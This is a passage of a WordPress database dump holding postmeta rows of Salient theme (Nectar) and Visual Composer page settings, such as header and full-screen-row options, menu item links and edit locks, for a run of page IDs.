_media_upload_mp4',''),(4539,6429,'_nectar_media_upload_ogv',''),(4540,6429,'_nectar_slider_preview_image',''),(4541,6429,'_nectar_header_bg',''),(4542,6429,'_nectar_header_parallax','off'),(4543,6429,'_nectar_header_box_roll','off'),(4544,6429,'_nectar_header_bg_height',''),(4545,6429,'_nectar_header_fullscreen','off'),(4546,6429,'_nectar_header_title',''),(4547,6429,'_nectar_header_subtitle',''),(4548,6429,'_nectar_page_header_text-effect','none'),(4549,6429,'_nectar_particle_rotation_timing',''),(4550,6429,'_nectar_particle_disable_explosion','off'),(4551,6429,'_nectar_page_header_alignment','left'),(4552,6429,'_nectar_page_header_alignment_v','middle'),(4553,6429,'_nectar_page_header_bg_alignment','center'),(4554,6429,'_nectar_header_bg_color',''),(4555,6429,'_nectar_header_font_color',''),(4556,6429,'_nectar_header_bg_overlay_color',''),(4557,6429,'_disable_transparent_header','off'),(4558,6429,'_force_transparent_header','off'),(4559,6429,'_wpb_vc_js_status','false'),(4561,6429,'_dp_original','6272'),(4562,6429,'_edit_lock','1514430331:1'),(4563,6429,'_edit_last','1'),(4564,6431,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4565,6431,'_menu_item_type','post_type'),(4566,6431,'_menu_item_menu_item_parent','6274'),(4567,6431,'_menu_item_object_id','6429'),(4568,6431,'_menu_item_object','page'),(4569,6431,'_menu_item_target',''),(4570,6431,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(4571,6431,'_menu_item_xfn',''),(4572,6431,'_menu_item_url',''),(4574,6432,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4575,6432,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4576,6432,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4577,6432,'_wp_page_template','default'),(4578,6432,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(4579,6432,'nectar-metabox-portfolio-display-sortable','off'),(4580,6432,'_nectar_full_screen_rows','off'),(4581,6432,'_nectar_full_screen_rows_animation','none'),(4582,6432,'_nectar_full_screen_rows_animation_speed','medium'),(4583,6432,'_nectar_full_screen_rows_overall_bg_color',''),(4584,6432,'_nectar_full_screen_rows_anchors','off'),(4585,6432,'_nectar_full_screen_rows_mobile_disable','off'),(4586,6432,'_nectar_full_screen_rows_row_bg_animation','none'),(4587,6432,'_nectar_full_screen_rows_dot_navigation','tooltip'),(4588,6432,'_nectar_full_screen_rows_content_overflow','scrollbar'),(4589,6432,'_nectar_full_screen_rows_footer','none'),(4590,6432,'_nectar_slider_bg_type','image_bg'),(4591,6432,'_nectar_canvas_shapes',''),(4592,6432,'_nectar_media_upload_webm',''),(4593,6432,'_nectar_media_upload_mp4',''),(4594,6432,'_nectar_media_upload_ogv',''),(4595,6432,'_nectar_slider_preview_image',''),(4596,6432,'_nectar_header_bg',''),(4597,6432,'_nectar_header_parallax','off'),(4598,6432,'_nectar_header_box_roll','off'),(4599,6432,'_nectar_header_bg_height',''),(4600,6432,'_nectar_header_fullscreen','off'),(4601,6432,'_nectar_header_title',''),(4602,6432,'_nectar_header_subtitle',''),(4603,6432,'_nectar_page_header_text-effect','none'),(4604,6432,'_nectar_particle_rotation_timing',''),(4605,6432,'_nectar_particle_disable_explosion','off'),(4606,6432,'_nectar_page_header_alignment','left'),(4607,6432,'_nectar_page_header_alignment_v','middle'),(4608,6432,'_nectar_page_header_bg_alignment','center'),(4609,6432,'_nectar_header_bg_color',''),(4610,6432,'_nectar_header_font_color',''),(4611,6432,'_nectar_header_bg_overlay_color',''),(4612,6432,'_disable_transparent_header','off'),(4613,6432,'_force_transparent_header','off'),(4614,6432,'_wpb_vc_js_status','false'),(4616,6432,'_dp_original','6272'),(4617,6432,'_edit_lock','1514430651:1'),(4618,6432,'_edit_last','1'),(4619,6434,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4620,6434,'_menu_item_type','post_type'),(4621,6434,'_menu_item_menu_item_parent','6274'),(4622,6434,'_menu_item_object_id','6432'),(4623,6434,'_menu_item_object','page'),(4624,6434,'_menu_item_target',''),(4625,6434,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(4626,6434,'_menu_item_xfn',''),(4627,6434,'_menu_item_url',''),(4629,6435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4630,6435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4631,6435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4632,6435,'_wp_page_template','default'),(4633,6435,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(4634,6435,'nectar-metabox-portfolio-display-sortable','off'),(4635,6435,'_nectar_full_screen_rows','off'),(4636,6435,'_nectar_full_screen_rows_animation','none'),(4637,6435,'_nectar_full_screen_rows_animation_speed','medium'),(4638,6435,'_nectar_full_screen_rows_overall_bg_color',''),(4639,6435,'_nectar_full_screen_rows_anchors','off'),(4640,6435,'_nectar_full_screen_rows_mobile_disable','off'),(4641,6435,'_nectar_full_screen_rows_row_bg_animation','none'),(4642,6435,'_nectar_full_screen_rows_dot_navigation','tooltip'),(4643,6435,'_nectar_full_screen_rows_content_overflow','scrollbar'),(4644,6435,'_nectar_full_screen_rows_footer','none'),(4645,6435,'_nectar_slider_bg_type','image_bg'),(4646,6435,'_nectar_canvas_shapes',''),(4647,6435,'_nectar_media_upload_webm',''),(4648,6435,'_nectar_media_upload_mp4',''),(4649,6435,'_nectar_media_upload_ogv',''),(4650,6435,'_nectar_slider_preview_image',''),(4651,6435,'_nectar_header_bg',''),(4652,6435,'_nectar_header_parallax','off'),(4653,6435,'_nectar_header_box_roll','off'),(4654,6435,'_nectar_header_bg_height',''),(4655,6435,'_nectar_header_fullscreen','off'),(4656,6435,'_nectar_header_title',''),(4657,6435,'_nectar_header_subtitle',''),(4658,6435,'_nectar_page_header_text-effect','none'),(4659,6435,'_nectar_particle_rotation_timing',''),(4660,6435,'_nectar_particle_disable_explosion','off'),(4661,6435,'_nectar_page_header_alignment','left'),(4662,6435,'_nectar_page_header_alignment_v','middle'),(4663,6435,'_nectar_page_header_bg_alignment','center'),(4664,6435,'_nectar_header_bg_color',''),(4665,6435,'_nectar_header_font_color',''),(4666,6435,'_nectar_header_bg_overlay_color',''),(4667,6435,'_disable_transparent_header','off'),(4668,6435,'_force_transparent_header','off'),(4669,6435,'_wpb_vc_js_status','false'),(4671,6435,'_dp_original','6272'),(4672,6435,'_edit_lock','1514431113:1'),(4673,6435,'_edit_last','1'),(4674,6437,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4675,6437,'_menu_item_type','post_type'),(4676,6437,'_menu_item_menu_item_parent','6274'),(4677,6437,'_menu_item_object_id','6435'),(4678,6437,'_menu_item_object','page'),(4679,6437,'_menu_item_target',''),(4680,6437,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(4681,6437,'_menu_item_xfn',''),(4682,6437,'_menu_item_url',''),(4684,6439,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4685,6439,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4686,6439,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4687,6439,'_wp_page_template','default'),(4688,6439,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(4689,6439,'nectar-metabox-portfolio-display-sortable','off'),(4690,6439,'_nectar_full_screen_rows','off'),(4691,6439,'_nectar_full_screen_rows_animation','none'),(4692,6439,'_nectar_full_screen_rows_animation_speed','medium'),(4693,6439,'_nectar_full_screen_rows_overall_bg_color',''),(4694,6439,'_nectar_full_screen_rows_anchors','off'),(4695,6439,'_nectar_full_screen_rows_mobile_disable','off'),(4696,6439,'_nectar_full_screen_rows_row_bg_animation','none'),(4697,6439,'_nectar_full_screen_rows_dot_navigation','tooltip'),(4698,6439,'_nectar_full_screen_rows_content_overflow','scrollbar'),(4699,6439,'_nectar_full_screen_rows_footer','none'),(4700,6439,'_nectar_slider_bg_type','image_bg'),(4701,6439,'_nectar_canvas_shapes',''),(4702,6439,'_nectar_media_upload_webm',''),(4703,6439,'_nectar_media_upload_mp4',''),(4704,6439,'_nectar_media_upload_ogv',''),(4705,6439,'_nectar_slider_preview_image',''),(4706,6439,'_nectar_header_bg',''),(4707,6439,'_nectar_header_parallax','off'),(4708,6439,'_nectar_header_box_roll','off'),(4709,6439,'_nectar_header_bg_height',''),(4710,6439,'_nectar_header_fullscreen','off'),(4711,6439,'_nectar_header_title',''),(4712,6439,'_nectar_header_subtitle',''),(4713,6439,'_nectar_page_header_text-effect','none'),(4714,6439,'_nectar_particle_rotation_timing',''),(4715,6439,'_nectar_particle_disable_explosion','off'),(4716,6439,'_nectar_page_header_alignment','left'),(4717,6439,'_nectar_page_header_alignment_v','middle'),(4718,6439,'_nectar_page_header_bg_alignment','center'),(4719,6439,'_nectar_header_bg_color',''),(4720,6439,'_nectar_header_font_color',''),(4721,6439,'_nectar_header_bg_overlay_color',''),(4722,6439,'_disable_transparent_header','off'),(4723,6439,'_force_transparent_header','off'),(4724,6439,'_wpb_vc_js_status','false'),(4726,6439,'_dp_original','6275'),(4727,6439,'_edit_lock','1514431350:1'),(4728,6439,'_edit_last','1'),(4729,6441,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4730,6441,'_menu_item_type','post_type'),(4731,6441,'_menu_item_menu_item_parent','6277'),(4732,6441,'_menu_item_object_id','6439'),(4733,6441,'_menu_item_object','page'),(4734,6441,'_menu_item_target',''),(4735,6441,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(4736,6441,'_menu_item_xfn',''),(4737,6441,'_menu_item_url',''),(4739,6442,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4740,6442,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4741,6442,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4742,6442,'_wp_page_template','default'),(4743,6442,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(4744,6442,'nectar-metabox-portfolio-display-sortable','off'),(4745,6442,'_nectar_full_screen_rows','off'),(4746,6442,'_nectar_full_screen_rows_animation','none'),(4747,6442,'_nectar_full_screen_rows_animation_speed','medium'),(4748,6442,'_nectar_full_screen_rows_overall_bg_color',''),(4749,6442,'_nectar_full_screen_rows_anchors','off'),(4750,6442,'_nectar_full_screen_rows_mobile_disable','off'),(4751,6442,'_nectar_full_screen_rows_row_bg_animation','none'),(4752,6442,'_nectar_full_screen_rows_dot_navigation','tooltip'),(4753,6442,'_nectar_full_screen_rows_content_overflow','scrollbar'),(4754,6442,'_nectar_full_screen_rows_footer','none'),(4755,6442,'_nectar_slider_bg_type','image_bg'),(4756,6442,'_nectar_canvas_shapes',''),(4757,6442,'_nectar_media_upload_webm',''),(4758,6442,'_nectar_media_upload_mp4',''),(4759,6442,'_nectar_media_upload_ogv',''),(4760,6442,'_nectar_slider_preview_image',''),(4761,6442,'_nectar_header_bg',''),(4762,6442,'_nectar_header_parallax','off'),(4763,6442,'_nectar_header_box_roll','off'),(4764,6442,'_nectar_header_bg_height',''),(4765,6442,'_nectar_header_fullscreen','off'),(4766,6442,'_nectar_header_title',''),(4767,6442,'_nectar_header_subtitle',''),(4768,6442,'_nectar_page_header_text-effect','none'),(4769,6442,'_nectar_particle_rotation_timing',''),(4770,6442,'_nectar_particle_disable_explosion','off'),(4771,6442,'_nectar_page_header_alignment','left'),(4772,6442,'_nectar_page_header_alignment_v','middle'),(4773,6442,'_nectar_page_header_bg_alignment','center'),(4774,6442,'_nectar_header_bg_color',''),(4775,6442,'_nectar_header_font_color',''),(4776,6442,'_nectar_header_bg_overlay_color',''),(4777,6442,'_disable_transparent_header','off'),(4778,6442,'_force_transparent_header','off'),(4779,6442,'_wpb_vc_js_status','false'),(4781,6442,'_dp_original','6275'),(4782,6442,'_edit_lock','1514431464:1'),(4783,6442,'_edit_last','1'),(4784,6444,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4785,6444,'_menu_item_type','post_type'),(4786,6444,'_menu_item_menu_item_parent','6277'),(4787,6444,'_menu_item_object_id','6442'),(4788,6444,'_menu_item_object','page'),(4789,6444,'_menu_item_target',''),(4790,6444,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(4791,6444,'_menu_item_xfn',''),(4792,6444,'_menu_item_url',''),(4794,6445,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4795,6445,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4796,6445,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4797,6445,'_wp_page_template','default'),(4798,6445,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(4799,6445,'nectar-metabox-portfolio-display-sortable','off'),(4800,6445,'_nectar_full_screen_rows','off'),(4801,6445,'_nectar_full_screen_rows_animation','none'),(4802,6445,'_nectar_full_screen_rows_animation_speed','medium'),(4803,6445,'_nectar_full_screen_rows_overall_bg_color',''),(4804,6445,'_nectar_full_screen_rows_anchors','off'),(4805,6445,'_nectar_full_screen_rows_mobile_disable','off'),(4806,6445,'_nectar_full_screen_rows_row_bg_animation','none'),(4807,6445,'_nectar_full_screen_rows_dot_navigation','tooltip'),(4808,6445,'_nectar_full_screen_rows_content_overflow','scrollbar'),(4809,6445,'_nectar_full_screen_rows_footer','none'),(4810,6445,'_nectar_slider_bg_type','image_bg'),(4811,6445,'_nectar_canvas_shapes',''),(4812,6445,'_nectar_media_upload_webm',''),(4813,6445,'_nectar_media_upload_mp4',''),(4814,6445,'_nectar_media_upload_ogv',''),(4815,6445,'_nectar_slider_preview_image',''),(4816,6445,'_nectar_header_bg',''),(4817,6445,'_nectar_header_parallax','off'),(4818,6445,'_nectar_header_box_roll','off'),(4819,6445,'_nectar_header_bg_height',''),(4820,6445,'_nectar_header_fullscreen','off'),(4821,6445,'_nectar_header_title',''),(4822,6445,'_nectar_header_subtitle',''),(4823,6445,'_nectar_page_header_text-effect','none'),(4824,6445,'_nectar_particle_rotation_timing',''),(4825,6445,'_nectar_particle_disable_explosion','off'),(4826,6445,'_nectar_page_header_alignment','left'),(4827,6445,'_nectar_page_header_alignment_v','middle'),(4828,6445,'_nectar_page_header_bg_alignment','center'),(4829,6445,'_nectar_header_bg_color',''),(4830,6445,'_nectar_header_font_color',''),(4831,6445,'_nectar_header_bg_overlay_color',''),(4832,6445,'_disable_transparent_header','off'),(4833,6445,'_force_transparent_header','off'),(4834,6445,'_wpb_vc_js_status','false'),(4836,6445,'_dp_original','6275'),(4837,6445,'_edit_lock','1514431583:1'),(4838,6445,'_edit_last','1'),(4839,6447,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4840,6447,'_menu_item_type','post_type'),(4841,6447,'_menu_item_menu_item_parent','6277'),(4842,6447,'_menu_item_object_id','6445'),(4843,6447,'_menu_item_object','page'),(4844,6447,'_menu_item_target',''),(4845,6447,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(4846,6447,'_menu_item_xfn',''),(4847,6447,'_menu_item_url',''),(4849,6448,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4850,6448,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4851,6448,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4852,6448,'_wp_page_template','default'),(4853,6448,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(4854,6448,'nectar-metabox-portfolio-display-sortable','off'),(4855,6448,'_nectar_full_screen_rows','off'),(4856,6448,'_nectar_full_screen_rows_animation','none'),(4857,6448,'_nectar_full_screen_rows_animation_speed','medium'),(4858,6448,'_nectar_full_screen_rows_overall_bg_color',''),(4859,6448,'_nectar_full_screen_rows_anchors','off'),(4860,6448,'_nectar_full_screen_rows_mobile_disable','off'),(4861,6448,'_nectar_full_screen_rows_row_bg_animation','none'),(4862,6448,'_nectar_full_screen_rows_dot_navigation','tooltip'),(4863,6448,'_nectar_full_screen_rows_content_overflow','scrollbar'),(4864,6448,'_nectar_full_screen_rows_footer','none'),(4865,6448,'_nectar_slider_bg_type','image_bg'),(4866,6448,'_nectar_canvas_shapes',''),(4867,6448,'_nectar_media_upload_webm',''),(4868,6448,'_nectar_media_upload_mp4',''),(4869,6448,'_nectar_media_upload_ogv',''),(4870,6448,'_nectar_slider_preview_image',''),(4871,6448,'_nectar_header_bg',''),(4872,6448,'_nectar_header_parallax','off'),(4873,6448,'_nectar_header_box_roll','off'),(4874,6448,'_nectar_header_bg_height',''),(4875,6448,'_nectar_header_fullscreen','off'),(4876,6448,'_nectar_header_title',''),(4877,6448,'_nectar_header_subtitle',''),(4878,6448,'_nectar_page_header_text-effect','none'),(4879,6448,'_nectar_particle_rotation_timing',''),(4880,6448,'_nectar_particle_disable_explosion','off'),(4881,6448,'_nectar_page_header_alignment','left'),(4882,6448,'_nectar_page_header_alignment_v','middle'),(4883,6448,'_nectar_page_header_bg_alignment','center'),(4884,6448,'_nectar_header_bg_color',''),(4885,6448,'_nectar_header_font_color',''),(4886,6448,'_nectar_header_bg_overlay_color',''),(4887,6448,'_disable_transparent_header','off'),(4888,6448,'_force_transparent_header','off'),(4889,6448,'_wpb_vc_js_status','false'),(4891,6448,'_dp_original','6275'),(4892,6448,'_edit_lock','1514431749:1'),(4893,6448,'_edit_last','1'),(4894,6450,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4895,6450,'_menu_item_type','post_type'),(4896,6450,'_menu_item_menu_item_parent','6277'),(4897,6450,'_menu_item_object_id','6448'),(4898,6450,'_menu_item_object','page'),(4899,6450,'_menu_item_target',''),(4900,6450,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(4901,6450,'_menu_item_xfn',''),(4902,6450,'_menu_item_url',''),(4904,6451,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4905,6451,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4906,6451,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4907,6451,'_wp_page_template','default'),(4908,6451,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(4909,6451,'nectar-metabox-portfolio-display-sortable','off'),(4910,6451,'_nectar_full_screen_rows','off'),(4911,6451,'_nectar_full_screen_rows_animation','none'),(4912,6451,'_nectar_full_screen_rows_animation_speed','medium'),(4913,6451,'_nectar_full_screen_rows_overall_bg_color',''),(4914,6451,'_nectar_full_screen_rows_anchors','off'),(4915,6451,'_nectar_full_screen_rows_mobile_disable','off'),(4916,6451,'_nectar_full_screen_rows_row_bg_animation','none'),(4917,6451,'_nectar_full_screen_rows_dot_navigation','tooltip'),(4918,6451,'_nectar_full_screen_rows_content_overflow','scrollbar'),(4919,6451,'_nectar_full_screen_rows_footer','none'),(4920,6451,'_nectar_slider_bg_type','image_bg'),(4921,6451,'_nectar_canvas_shapes',''),(4922,6451,'_nectar_media_upload_webm',''),(4923,6451,'_nectar_media_upload_mp4',''),(4924,6451,'_nectar_media_upload_ogv',''),(4925,6451,'_nectar_slider_preview_image',''),(4926,6451,'_nectar_header_bg',''),(4927,6451,'_nectar_header_parallax','off'),(4928,6451,'_nectar_header_box_roll','off'),(4929,6451,'_nectar_header_bg_height',''),(4930,6451,'_nectar_header_fullscreen','off'),(4931,6451,'_nectar_header_title',''),(4932,6451,'_nectar_header_subtitle',''),(4933,6451,'_nectar_page_header_text-effect','none'),(4934,6451,'_nectar_particle_rotation_timing',''),(4935,6451,'_nectar_particle_disable_explosion','off'),(4936,6451,'_nectar_page_header_alignment','left'),(4937,6451,'_nectar_page_header_alignment_v','middle'),(4938,6451,'_nectar_page_header_bg_alignment','center'),(4939,6451,'_nectar_header_bg_color',''),(4940,6451,'_nectar_header_font_color',''),(4941,6451,'_nectar_header_bg_overlay_color',''),(4942,6451,'_disable_transparent_header','off'),(4943,6451,'_force_transparent_header','off'),(4944,6451,'_wpb_vc_js_status','false'),(4946,6451,'_dp_original','6275'),(4947,6451,'_edit_lock','1514432674:1'),(4948,6451,'_edit_last','1'),(4949,6453,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4950,6453,'_menu_item_type','post_type'),(4951,6453,'_menu_item_menu_item_parent','6277'),(4952,6453,'_menu_item_object_id','6451'),(4953,6453,'_menu_item_object','page'),(4954,6453,'_menu_item_target',''),(4955,6453,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(4956,6453,'_menu_item_xfn',''),(4957,6453,'_menu_item_url',''),(4959,6454,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4960,6454,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4961,6454,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4962,6454,'_wp_page_template','default'),(4963,6454,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(4964,6454,'nectar-metabox-portfolio-display-sortable','off'),(4965,6454,'_nectar_full_screen_rows','off'),(4966,6454,'_nectar_full_screen_rows_animation','none'),(4967,6454,'_nectar_full_screen_rows_animation_speed','medium'),(4968,6454,'_nectar_full_screen_rows_overall_bg_color',''),(4969,6454,'_nectar_full_screen_rows_anchors','off'),(4970,6454,'_nectar_full_screen_rows_mobile_disable','off'),(4971,6454,'_nectar_full_screen_rows_row_bg_animation','none'),(4972,6454,'_nectar_full_screen_rows_dot_navigation','tooltip'),(4973,6454,'_nectar_full_screen_rows_content_overflow','scrollbar'),(4974,6454,'_nectar_full_screen_rows_footer','none'),(4975,6454,'_nectar_slider_bg_type','image_bg'),(4976,6454,'_nectar_canvas_shapes',''),(4977,6454,'_nectar_media_upload_webm',''),(4978,6454,'_nectar_media_upload_mp4',''),(4979,6454,'_nectar_media_upload_ogv',''),(4980,6454,'_nectar_slider_preview_image',''),(4981,6454,'_nectar_header_bg',''),(4982,6454,'_nectar_header_parallax','off'),(4983,6454,'_nectar_header_box_roll','off'),(4984,6454,'_nectar_header_bg_height',''),(4985,6454,'_nectar_header_fullscreen','off'),(4986,6454,'_nectar_header_title',''),(4987,6454,'_nectar_header_subtitle',''),(4988,6454,'_nectar_page_header_text-effect','none'),(4989,6454,'_nectar_particle_rotation_timing',''),(4990,6454,'_nectar_particle_disable_explosion','off'),(4991,6454,'_nectar_page_header_alignment','left'),(4992,6454,'_nectar_page_header_alignment_v','middle'),(4993,6454,'_nectar_page_header_bg_alignment','center'),(4994,6454,'_nectar_header_bg_color',''),(4995,6454,'_nectar_header_font_color',''),(4996,6454,'_nectar_header_bg_overlay_color',''),(4997,6454,'_disable_transparent_header','off'),(4998,6454,'_force_transparent_header','off'),(4999,6454,'_wpb_vc_js_status','false'),(5001,6454,'_dp_original','6275'),(5002,6454,'_edit_lock','1515647725:1'),(5003,6454,'_edit_last','1'),(5004,6456,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5005,6456,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5006,6456,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5007,6456,'_wp_page_template','default'),(5008,6456,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(5009,6456,'nectar-metabox-portfolio-display-sortable','off'),(5010,6456,'_nectar_full_screen_rows','off'),(5011,6456,'_nectar_full_screen_rows_animation','none'),(5012,6456,'_nectar_full_screen_rows_animation_speed','medium'),(5013,6456,'_nectar_full_screen_rows_overall_bg_color',''),(5014,6456,'_nectar_full_screen_rows_anchors','off'),(5015,6456,'_nectar_full_screen_rows_mobile_disable','off'),(5016,6456,'_nectar_full_screen_rows_row_bg_animation','none'),(5017,6456,'_nectar_full_screen_rows_dot_navigation','tooltip'),(5018,6456,'_nectar_full_screen_rows_content_overflow','scrollbar'),(5019,6456,'_nectar_full_screen_rows_footer','none'),(5020,6456,'_nectar_slider_bg_type','image_bg'),(5021,6456,'_nectar_canvas_shapes',''),(5022,6456,'_nectar_media_upload_webm',''),(5023,6456,'_nectar_media_upload_mp4',''),(5024,6456,'_nectar_media_upload_ogv',''),(5025,6456,'_nectar_slider_preview_image',''),(5026,6456,'_nectar_header_bg',''),(5027,6456,'_nectar_header_parallax','off'),(5028,6456,'_nectar_header_box_roll','off'),(5029,6456,'_nectar_header_bg_height',''),(5030,6456,'_nectar_header_fullscreen','off'),(5031,6456,'_nectar_header_title',''),(5032,6456,'_nectar_header_subtitle',''),(5033,6456,'_nectar_page_header_text-effect','none'),(5034,6456,'_nectar_particle_rotation_timing',''),(5035,6456,'_nectar_particle_disable_explosion','off'),(5036,6456,'_nectar_page_header_alignment','left'),(5037,6456,'_nectar_page_header_alignment_v','middle'),(5038,6456,'_nectar_page_header_bg_alignment','center'),(5039,6456,'_nectar_header_bg_color',''),(5040,6456,'_nectar_header_font_color',''),(5041,6456,'_nectar_header_bg_overlay_color',''),(5042,6456,'_disable_transparent_header','off'),(5043,6456,'_force_transparent_header','off'),(5044,6456,'_wpb_vc_js_status','false'),(5046,6456,'_dp_original','6275'),(5047,6456,'_edit_lock','1514950988:1'),(5048,6456,'_edit_last','1'),(5049,6458,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5050,6458,'_menu_item_type','post_type'),(5051,6458,'_menu_item_menu_item_parent','6277'),(5052,6458,'_menu_item_object_id','6456'),(5053,6458,'_menu_item_object','page'),(5054,6458,'_menu_item_target',''),(5055,6458,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(5056,6458,'_menu_item_xfn',''),(5057,6458,'_menu_item_url',''),(5059,6459,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5060,6459,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5061,6459,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5062,6459,'_wp_page_template','default'),(5063,6459,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(5064,6459,'nectar-metabox-portfolio-display-sortable','off'),(5065,6459,'_nectar_full_screen_rows','off'),(5066,6459,'_nectar_full_screen_rows_animation','none'),(5067,6459,'_nectar_full_screen_rows_animation_speed','medium'),(5068,6459,'_nectar_full_screen_rows_overall_bg_color',''),(5069,6459,'_nectar_full_screen_rows_anchors','off'),(5070,6459,'_nectar_full_screen_rows_mobile_disable','off'),(5071,6459,'_nectar_full_screen_rows_row_bg_animation','none'),(5072,6459,'_nectar_full_screen_rows_dot_navigation','tooltip'),(5073,6459,'_nectar_full_screen_rows_content_overflow','scrollbar'),(5074,6459,'_nectar_full_screen_rows_footer','none'),(5075,6459,'_nectar_slider_bg_type','image_bg'),(5076,6459,'_nectar_canvas_shapes',''),(5077,6459,'_nectar_media_upload_webm',''),(5078,6459,'_nectar_media_upload_mp4',''),(5079,6459,'_nectar_media_upload_ogv',''),(5080,6459,'_nectar_slider_preview_image',''),(5081,6459,'_nectar_header_bg',''),(5082,6459,'_nectar_header_parallax','off'),(5083,6459,'_nectar_header_box_roll','off'),(5084,6459,'_nectar_header_bg_height',''),(5085,6459,'_nectar_header_fullscreen','off'),(5086,6459,'_nectar_header_title',''),(5087,6459,'_nectar_header_subtitle',''),(5088,6459,'_nectar_page_header_text-effect','none'),(5089,6459,'_nectar_particle_rotation_timing',''),(5090,6459,'_nectar_particle_disable_explosion','off'),(5091,6459,'_nectar_page_header_alignment','left'),(5092,6459,'_nectar_page_header_alignment_v','middle'),(5093,6459,'_nectar_page_header_bg_alignment','center'),(5094,6459,'_nectar_header_bg_color',''),(5095,6459,'_nectar_header_font_color',''),(5096,6459,'_nectar_header_bg_overlay_color',''),(5097,6459,'_disable_transparent_header','off'),(5098,6459,'_force_transparent_header','off'),(5099,6459,'_wpb_vc_js_status','false'),(5101,6459,'_dp_original','6275'),(5102,6459,'_edit_lock','1514951102:1'),(5103,6459,'_edit_last','1'),(5104,6461,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5105,6461,'_menu_item_type','post_type'),(5106,6461,'_menu_item_menu_item_parent','6277'),(5107,6461,'_menu_item_object_id','6459'),(5108,6461,'_menu_item_object','page'),(5109,6461,'_menu_item_target',''),(5110,6461,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(5111,6461,'_menu_item_xfn',''),(5112,6461,'_menu_item_url',''),(5114,6462,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5115,6462,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5116,6462,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5117,6462,'_wp_page_template','default'),(5118,6462,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(5119,6462,'nectar-metabox-portfolio-display-sortable','off'),(5120,6462,'_nectar_full_screen_rows','off'),(5121,6462,'_nectar_full_screen_rows_animation','none'),(5122,6462,'_nectar_full_screen_rows_animation_speed','medium'),(5123,6462,'_nectar_full_screen_rows_overall_bg_color',''),(5124,6462,'_nectar_full_screen_rows_anchors','off'),(5125,6462,'_nectar_full_screen_rows_mobile_disable','off'),(5126,6462,'_nectar_full_screen_rows_row_bg_animation','none'),(5127,6462,'_nectar_full_screen_rows_dot_navigation','to